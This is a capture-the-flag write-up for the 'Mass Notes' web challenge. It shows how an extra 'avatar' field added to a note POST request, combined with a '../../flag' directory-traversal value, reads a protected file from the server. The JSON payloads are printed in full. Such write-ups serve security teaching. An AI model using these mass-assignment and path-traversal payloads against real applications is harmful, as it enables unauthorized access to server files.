Mass Notes
- Category: Web
- 250 Points
- Solved by the JCTF Team
Description
Solution
Following the supplied link, we arrive at a note publishing site.
Let's go ahead and try publishing a note.
Publishing a note results in a POST to https://mass-notes.chal.intentsummit.org/note
with a payload of
{"title":"note1","content":"nothing"}
after which the site redirects to a note.html page with our note info and some additional fields as query string parameters:
{"title":"note1","content":"nothing","avatar":"default_1.png","_id":"61920ccd33d4322c481ea80d","__v":0}
What happens if we POST a note using all of these parameters instead of just the title and content?
We get an error which seems to indicate the id has already been used.
Not a problem though, we'll just remove the id field, POST again... and we get a valid response:
{
"title": "note1",
"content": "nothing",
"avatar": "default_1.png",
"_id": "6192149b33d4322c481ea81d",
"__v": 0
}
Now what happens if we change the avatar field to something else?
Trying default_2.png or default_3.png still results in a valid response:
{
"title": "note1",
"content": "nothing",
"avatar": "default_3.png",
"_id": "6192156e33d4322c481ea823",
"__v": 0
}
The note.html page we saw earlier shows us our note content along with an avatar image.
This avatar is retrieved by a GET request to https://mass-notes.chal.intentsummit.org/avatar/61920ccd33d4322c481ea80d.png
where the avatar file name is based on the id of our note with the added .png extension.
If we GET the avatar images for our custom notes, we get different avatar images!
Let's try setting a more interesting avatar...
We POST a note with the following payload:
{
"title": "note1",
"content": "nothing",
"avatar": "flag.png",
"__v": 0
}
When we GET the corresponding avatar image (using the returned id and adding the .png extension), we find not an image but an error message:
Error: ENOENT: no such file or directory, open '/app/avatars/flag.png'
From here it's a matter of guessing the flag file name and adding some directory traversal...
We POST the following note:
{
"title": "note1",
"content": "nothing",
"avatar": "../../flag",
"__v": 0
}
and then we can simply GET our avatar (again using the returned id and adding the .png extension), which now produces the flag: INTENT{d0nt_mass_with_ap1s}